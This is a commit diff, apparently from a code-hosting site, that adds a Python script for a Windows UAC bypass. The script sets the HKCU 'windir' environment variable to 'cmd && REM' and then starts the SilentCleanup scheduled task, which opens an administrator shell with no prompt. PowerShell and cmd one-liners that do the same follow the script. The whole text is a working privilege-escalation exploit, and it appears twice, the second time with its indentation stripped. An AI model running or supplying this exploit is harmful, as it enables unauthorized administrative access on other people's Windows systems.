makelariss · June 17, 2021 21:13
diff --git a/uacbypassEnviromentVariableExpansion.py b/uacbypassEnviromentVariableExpansion.py
 # -*- coding: utf-8 -*-
 # All credits go to https://tyranidslair.blogspot.gr/2017/05/exploiting-environment-variables-in.html
 '''
 SilentCleanup has a "Highest" RunLevel meaning it will elevate the scheduled task to administrator without any prompting.
 It also contains enviroment variables in the path set on "Execute" (%windir%\system32\cleanmgr.exe), the Enviroment variables are stored in the HKCU registry hive which is write accesible by a user. (HKCU\Environment)
 We can perform a AlwaysNotify UAC Bypass by changing the enviroment variable's 'windir' value to our own payload and triggering it through the SilentCleanup scheduled task.
 '''

 from _winreg import *
 HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
 registrykey = OpenKey(HKCU, 'Environment', 0, KEY_ALL_ACCESS)
 print "Modifying windir environment variable"

 SetValueEx(registrykey, 'windir', 0, REG_SZ, 'cmd && REM')   # so our payload will basically be (cmd && REM\system32\cleanmgr.exe) and REM comments out the rest of the line
 print "Setting payload"

 from ctypes.wintypes import *
 from ctypes import *
 shell32  = WinDLL('shell32' , use_last_error=True)
 kernel32 = WinDLL('kernel32', use_last_error=True)


 LPCTSTR = c_char_p
 # Contains information used by ShellExecuteEx.
                                                              # https://msdn.microsoft.com/en-us/library/windows/desktop/bb759784(v=vs.85).aspx
 class ShellExecuteInfo(Structure):                           # typedef struct _SHELLEXECUTEINFO
     _fields_ = [                                            # {
                 ('cbSize',                       DWORD),    # DWORD     cbSize;
                 ('fMask',                        ULONG),    # ULONG     fMask;
                 ('hwnd',                          HWND),    # HWND      hwnd;
                 ('lpVerb',                     LPCTSTR),    # LPCTSTR   lpVerb;
                 ('lpFile',                     LPCTSTR),    # LPCTSTR   lpFile;
                 ('lpParameters',               LPCTSTR),    # LPCTSTR   lpParameters;
                 ('lpDirectory',                LPCTSTR),    # LPCTSTR   lpDirectory;
                 ('nShow',                        c_int),    # int       nShow;
                 ('hInstApp',                 HINSTANCE),    # HINSTANCE hInstApp;
                 ('lpIDList',                    LPVOID),    # LPVOID    lpIDList;
                 ('lpClass',                      LPSTR),    # LPCTSTR   lpClass;
                 ('hKeyClass',                     HKEY),    # HKEY      hkeyClass;
                 ('dwHotKey',                     DWORD),    # DWORD     dwHotKey;
                 ('hIcon',                       HANDLE),    # union { HANDLE hIcon; HANDLE hMonitor;}
                 ('hProcess',                    HANDLE)     # HANDLE    hProcess;
                 ]                                           # }

 PShellExecuteInfo = POINTER(ShellExecuteInfo)

 ShellExecuteEx = shell32.ShellExecuteEx
 ShellExecuteEx.restype = BOOL
 ShellExecuteEx.argtypes = [
    PShellExecuteInfo
    ]

 SW_HIDE = 0

 ShellExecute = ShellExecuteInfo()
 ShellExecute.cbSize = sizeof(ShellExecute)
 ShellExecute.lpFile = u'schtasks.exe'
 ShellExecute.lpParameters = u'/Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I'
 ShellExecute.nShow = SW_HIDE
 ShellExecuteEx(byref(ShellExecute))
 print "Triggering SilentCleanup, should spawn a shell with administrative privileges"
 import time; time.sleep(1)

 DeleteValue(registrykey, 'windir')
 CloseKey(registrykey)


 '''
 Windows PowerShell
 Copyright (C) Microsoft Corporation. All rights reserved.
 PS C:\Users\uknown> New-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Value "cmd && REM" | Out-Null
 PS C:\Users\uknown> Start-Process -FilePath "schtasks.exe" -ArgumentList "/Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I"
 PS C:\Users\uknown> Remove-ItemProperty -Path "HKCU:\Environment" -Name "windir" -ErrorAction SilentlyContinue | Out-Nul
 '''
 '''
 Microsoft Windows [Version 10.0.16299.248]
 (c) 2017 Microsoft Corporation. All rights reserved.
 C:\Users\uknown>reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM " && schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
 '''

 '''
 34.
 - Author: James Forshaw
 -   Type: Shell API
 -   Method: Environment variables expansion
 -   Target(s): \system32\svchost.exe via \system32\schtasks.exe
 -   Component(s): Attacker defined
 -   Works from: Windows 8.1 (9600)
 -   AlwaysNotify compatible
 -   Fixed in: unfixed 🙈
 -       How: -

 '''
	# -- coding: utf-8 --
	# All credits go to https://tyranidslair.blogspot.gr/2017/05/exploiting-environment-variables-in.html
	'''
	SilentCleanup has a "Highest" RunLevel meaning it will elevate the scheduled task to administrator without any prompting.
	It also contains enviroment variables in the path set on "Execute" (%windir%\system32\cleanmgr.exe), the Enviroment variables are stored in the HKCU registry hive which is write accesible by a user. (HKCU\Environment)
	We can perform a AlwaysNotify UAC Bypass by changing the enviroment variable's 'windir' value to our own payload and triggering it through the SilentCleanup scheduled task.
	'''

	from _winreg import *
	HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
	registrykey = OpenKey(HKCU, 'Environment', 0, KEY_ALL_ACCESS)
	print "Modifying windir environment variable"

	SetValueEx(registrykey, 'windir', 0, REG_SZ, 'cmd && REM') # so our payload will basically be (cmd && REM\system32\cleanmgr.exe) and REM comments out the rest of the line
	print "Setting payload"

	from ctypes.wintypes import *
	from ctypes import *
	shell32 = WinDLL('shell32' , use_last_error=True)
	kernel32 = WinDLL('kernel32', use_last_error=True)


	LPCTSTR = c_char_p
	# Contains information used by ShellExecuteEx.
	# https://msdn.microsoft.com/en-us/library/windows/desktop/bb759784(v=vs.85).aspx
	class ShellExecuteInfo(Structure): # typedef struct _SHELLEXECUTEINFO
	_fields_ = [ # {
	('cbSize', DWORD), # DWORD cbSize;
	('fMask', ULONG), # ULONG fMask;
	('hwnd', HWND), # HWND hwnd;
	('lpVerb', LPCTSTR), # LPCTSTR lpVerb;
	('lpFile', LPCTSTR), # LPCTSTR lpFile;
	('lpParameters', LPCTSTR), # LPCTSTR lpParameters;
	('lpDirectory', LPCTSTR), # LPCTSTR lpDirectory;
	('nShow', c_int), # int nShow;
	('hInstApp', HINSTANCE), # HINSTANCE hInstApp;
	('lpIDList', LPVOID), # LPVOID lpIDList;
	('lpClass', LPSTR), # LPCTSTR lpClass;
	('hKeyClass', HKEY), # HKEY hkeyClass;
	('dwHotKey', DWORD), # DWORD dwHotKey;
	('hIcon', HANDLE), # union { HANDLE hIcon; HANDLE hMonitor;}
	('hProcess', HANDLE) # HANDLE hProcess;
	] # }

	PShellExecuteInfo = POINTER(ShellExecuteInfo)

	ShellExecuteEx = shell32.ShellExecuteEx
	ShellExecuteEx.restype = BOOL
	ShellExecuteEx.argtypes = [
	PShellExecuteInfo
	]

	SW_HIDE = 0

	ShellExecute = ShellExecuteInfo()
	ShellExecute.cbSize = sizeof(ShellExecute)
	ShellExecute.lpFile = u'schtasks.exe'
	ShellExecute.lpParameters = u'/Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I'
	ShellExecute.nShow = SW_HIDE
	ShellExecuteEx(byref(ShellExecute))
	print "Triggering SilentCleanup, should spawn a shell with administrative privileges"
	import time; time.sleep(1)

	DeleteValue(registrykey, 'windir')
	CloseKey(registrykey)


	'''
	Windows PowerShell
	Copyright (C) Microsoft Corporation. All rights reserved.
	PS C:\Users\uknown> New-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Value "cmd && REM" \| Out-Null
	PS C:\Users\uknown> Start-Process -FilePath "schtasks.exe" -ArgumentList "/Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I"
	PS C:\Users\uknown> Remove-ItemProperty -Path "HKCU:\Environment" -Name "windir" -ErrorAction SilentlyContinue \| Out-Nul
	'''
	'''
	Microsoft Windows [Version 10.0.16299.248]
	(c) 2017 Microsoft Corporation. All rights reserved.
	C:\Users\uknown>reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM " && schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
	'''

	'''
	34.
	- Author: James Forshaw
	- Type: Shell API
	- Method: Environment variables expansion
	- Target(s): \system32\svchost.exe via \system32\schtasks.exe
	- Component(s): Attacker defined
	- Works from: Windows 8.1 (9600)
	- AlwaysNotify compatible
	- Fixed in: unfixed 🙈
	- How: -

	'''